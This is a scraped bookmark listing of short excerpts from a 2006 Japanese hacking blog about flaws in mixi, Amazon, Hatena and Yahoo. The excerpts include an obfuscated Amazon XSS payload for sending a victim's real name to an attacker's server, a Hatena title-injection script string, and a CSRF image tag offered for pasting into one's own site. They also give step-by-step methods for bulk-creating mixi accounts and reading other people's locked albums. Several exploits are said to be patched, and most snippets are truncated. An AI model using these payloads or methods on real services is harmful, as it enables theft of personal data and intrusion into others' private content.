mixiがクローキングしちゃってる :: ぼくはまちちゃん!
Googleで「mixi」を検索してみました! すると、上からいくつかのところに「mixi(ミクシィ)モバイル」の文字がでてくるよね! うんうん…え、あれれ! 検索結果の要約のところに、しっかりとコンテンツの一部がでちゃってるよ! なんで! たしか http://m.mixi.jp/ って、PCで見にいっても このページへは携帯電話からのみアクセスできます。 パソコンのサイトはこちら なんて出るだけだったと思うんだけど…! なのになんで Google は中身を取得できてるの! ちなみにこのmixiモバイルって、 User Agent を 「DoCoMo/2.0 SH903i(c100;TB;W30H20)」 に変更したくらいでは 中身をみせてもらえません>< IPアドレスで制限してるのかな…! ふしぎふしぎ!どうなってるのこれって思って、User Agent を「google」に変更して
XSS - 表示系パラメータに存在する盲点 :: ぼくはまちちゃん!
こんにちはこんにちは!! クロスサイトスクリプティングの時間です! XSSというと…! まっさきに思いつくのが、入力データ送信 → 確認表示の部分での無害化漏れですよね! たとえばこんな感じのフォームから受け取ったパラメータを、 確認として表示するページとか! (入力) <form action="register.cgi" method="post"> タイトル:<input type="text" name="title"> ← 「ぼくはまちちゃん!」を入力 本文:<input type="text" name="body"> ← 「こんにちはこんにちは!!<script>alert(1)</script>」を入力 </form> (確認) <p>この内容で登録していい?</p> <p> タイトル: ぼくはまちちゃん!<br> 本文: こんにちはこんにちは!!<script>alert
mixiの画像サーバー :: ぼくはまちちゃん!
http://img-p1.mixi.jp/ HTTP/1.0 404 Not Found Date: Tue, 25 Jul 2006 18:10:36 GMT Server: e-trees.Japan freeocean (e7-3.0) Content-Length: 262 Content-Type: text/html; charset=iso-8859-1 Age: 119 X-Cache: HIT from vagar.mixi.jp Connection: keep-alive X-Tcbaddr: 600027df http://img-p2.mixi.jp/ HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Tue, 25 Jul 2006 18:12:04 GMT Ser
.go.jp からのアクセス気持ち悪い>< :: ぼくはまちちゃん!
soumu.go.jp とか>< なので、 .htaccess (とか httpd.conf) で RewriteEngine on RewriteCond %{REMOTE_HOST} \.go\.jp$ [NC] RewriteCond %{REQUEST_URI} !^/404.html RewriteRule .* http://hamachiya.com/404.html [L,R] ってしてみたよ! [NC] は、大文字小文字区別しないって印で [R] は、リダイレクトでとばすよーって印で ( R=301 みたいにステータスコードも書けるよ! ) [L] は最終行だよっていう印だよ! 他のドメインも制限したいなら、たとえば co.jp なら RewriteCond %{REMOTE_HOST} \.co\.jp$ [NC,OR] RewriteCond %{REMOTE_HOS
mixiミュージック - 消えたアーティスト :: ぼくはまちちゃん!
↓これ、ぼくのお気に入りのアーティスト「はまちや2」さん (わー同じ名前!) (クリックで拡大画像) インディーズっていうのかな。 マイナーな割には結構コアなファンがいたりして、 自分と同じように、よく iTunes なんかで聴いているひともいてたみたい! だから mixiミュージックでも視聴回数が、ぶっちぎりの 442回! ランキングでも、かなり上位にいたと思うよ! だけど… さっき、なにげなく mixiミュージックのランキングを見てみたら… (クリックで拡大画像) 消えてる>< どこにもいなくなってる>< あれれ「上位 98件」って! アーティスト「はまちや2」さんの曲が、ちょうど2曲消えちゃってるんだけど…! ( 「ぼくはまちちゃん!」って曲と、「こんにちはこんにちは!!」って曲だよ ) わーなんでいなくなってるのーって思って、 アーティスト「はまちや2」さんのページを確認してみたら
mixiミュージック送信機をつくってみたよ! :: ぼくはまちちゃん!
はまちや2さんの日記 mixiミュージック送信機をつくってみたよ!2006/05/23 [05:19] mixiミュージック送信機をつくってみた!! これがあれば、mixi station (mixiからダウンロードできるやつ win/mac) とか、 iTunes なしで、お気に入りの曲をガンガン送信できちゃうかもしれないよ! やったね! mixiミュージック送信機 ( 要:prototype.js ) 外部ドメイン通信だから、ローカル保存して IE系でひらかなきゃだめだけど! (つかいかた) ・mixiミュージック送信機 と prototype.js を右クリック保存 ・保存した送信機を IE とか Sleipnir でひらく ・メールとパスワードいれてログイン ・あとは好きなだけ、びしびし送信…! mixiiプレミアム会員のひとは、よかったらためしてみてね! …ちゃんと動くかわかんな
本名吸い取り機 (AMAZON XSS) :: ぼくはまちちゃん!
↓これ 超おすすめマンガなんです!!! うそだけど! ( 修正がはいりました。もう動きません ) 取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?本名"> かなんかでリクエストするようにしといて、その後、適当な書籍にリダイレクトさせたりすれば…! 本名吸い取り機のできあがり! こわいね>< リンクじゃなくて iframe とかにしちゃえば、へんなの踏ませる必要すらないよ! (ちょっとだけ解説) ↓urlデコードするとこう http://www.amazon.co.jp/exec/obidos/tg/detail/-/<body onload=eval(String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 9
超mixi足あとちょうについて :: ぼくはまちちゃん!
こんにちはこんにちは!! 現在の超mixi足あとちょうは、何度かのバージョンアップをして、以下のような内容になってますよ! きみのMIXI ID: きみのpostkey: きみのメールアドレス: ※mixiの修正が4回入って、現在は非表示 きみのブラウザ: きみのホスト名: リンク元: (おまけ4) きみのYahoo ID: (おまけ5) きみのHatena ID: (おまけ2) きみのlivedoor ID: (おまけ6) きみのGoogleアカウント: (おまけ3) きみのなまえ(amazon): (おまけ7) きみの好みのタイプ: (おまけ1) きみのクリップボードの中身 ところで、超mixi足あとちょうの追記にも書いたけれど、 「hamachiya.com を見にいかなければ大丈夫」で 思考停止するのって一番危険なんじゃないかな、と思うんだけど…! ここをみている一部の方々は、たぶ
はてなダイアリーの隠し機能で楽々更新 :: ぼくはまちちゃん!
やっぱりダイアリーってくらいだから、まいにち綴りたいものですよね!! だけど時間がなかったり、ネタがなかったりで なかなか日記が続かないとお悩みのあなたにこれ…! ぼくはまちちゃん!(Hatena) - 日記を自動的に書いてくれる日記 ※IE系のブラウザ限定でしかうごきません。ごめんね>< ※上のリンク先を見たら、自動的に日記とブックマークが一件づつ追加されちゃいます ※なので、見たあとは自分の日記とブックマークをよく確認してくださいね (参考url) 上のリンク先のブックマークコメント (追記) 動かなくなっちゃいました>< → http://d.hatena.ne.jp/hatenadiary/20060204/1139066130
はてなブックマークの超べんり機能 :: ぼくはまちちゃん!
タイトルを↓みたいに編集すれば、ユーザーが自由にScriptつかえちゃうんだね! ぼく、ゆめがひろがりんぐです! "width=100 height=100 onmouseover=alert(String.fromCharCode(88,83,83)) ※最初にダブルクォート、最後に空白をひとついれる。 あ、人気エントリーのタイトルとか書き換えたらダメだよ…! えらいことになっちゃうかも? (追記) http://test/ ってurlのブックマークにテスト用のコードを置いてみたよ! タイトルが以下になってて hamachiya.com/h のscriptを呼び出す感じ。 (消しゴムに触れると呼び出されて、hamachiya.comをブックマークに追加してしまうという内容) "width=100 height=100 onmouseover=d=document;t=String; s=
被お気に入り数を増やす / はてなの誰が見にきたかを知る :: ぼくはまちちゃん!
で、はてなブックマークの機能のひとつ「お気に入り」なんだけど、 これって他の人のブックマークを登録できちゃう機能なわけだよね! 自分のブックマークを何人のひとがお気に入りに登録しているのかも、ちゃんと表示される…と。 なるほど! それを増やす方法を考えてみました! といっても mixi足あとちょうと同じなんだけど…! きみのサイトに下のコードを貼り付けるだけだよ! <img src="http://b.hatena.ne.jp/きみのID/favorite?mode=add&name=きみのID" width="1" height="1"> もちろんlinkタグとかscriptタグとかcssのurl()で読み込んじゃっても大丈夫だと思う! 実際に動作するか、ためしてみたいひとは、はてなにログインした状態で↓のリンクをクリック! 勝手にはてなブックマークのお気に入りに追加しちゃうページ でも
Yahoo! Bookmarksは画期的な便利さだ!!! :: ぼくはまちちゃん!
はまちや2さんの日記 Yahoo! Bookmarksは画期的な便利さだ!!!2006/01/20 [16:50] ぼく普段からYahooなんて、せいぜい天気とか、たまにヤフオク見に行ったりするくらいで、 実はあまり知らなかったんだよ。 で、昨日 CSSXSSでYahoo!IDゲット みたいなこと書いたし、 他にどんなサービスがあるのかなぁと思って、ちょっと見にいってみたんだ。 そしたら「Yahoo! Bookmarks」なんてサービスがあるじゃん! さっそく使ってみたよ!! … うわなにこれ画期的!!!! やふー天才!?!?!?!?! ↓Yahoo! Bookmarksの天才なところ ・ふつうだと利用者が気に入ったページをブックマークするのに対し、 ・Yahooのは、サイト管理者が閲覧者のブックマークに追加できる! 斬新すぎwww 興味あるひとは、ものは試しに Yahoo! にログインし
[mixi] 登録済みメアドのみでアカウントを量産する方法 :: ぼくはまちちゃん!
mixiに登録済みのメールアドレスのみを使って新規アカウントを取得する方法。 ただし複数アカウントを持つのは規約違反だから、この方法を使うのは パソコンが苦手なバアチャンとかを招待したい時だけにしようね! まずはmixi新規登録手順のおさらいだ。 招待するひと:Aさん 招待されるひと:Bさん 1. Aさんがmixiの画面から招待 2. AさんからBさん宛に招待メールとどく 3. Bさんが仮登録 4. mixiからBさん宛に確認メールとどく 5. Bさんが確認メールのURLにアクセス 6. 完了 この流れをAさんのメールアドレスのみを使ってやる。 -------- [前準備] ・友人を招待のページ http://mixi.jp/invite.pl へいく ・適当なメールアドレスを入力 ※ブラックリスト入りしてるアドレスだとマズイので、 なるだけ「ありえないアドレス(ありえないドメイン)」を入
[mixi] 閲覧キー付きの他人のアルバムを見る方法 :: ぼくはまちちゃん!
1. メールを見せてくれるくらい仲の良いマイミクを1人確保 2. http://mixi.jp/invite_album.pl?id=xxx ここのxxx に見たいアルバムのidを入れる。 3. マイミクを選択して送信 4. 閲覧キーゲットだよ?wwwwwwwwwwwwwwww なにこれわろすwwwwwwwwwwwwwwwwwww
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
はてなリングのおみくじ機能 :: ぼくはまちちゃん!
いま話題のナニエモンの衝撃映像 :: ぼくはまちちゃん!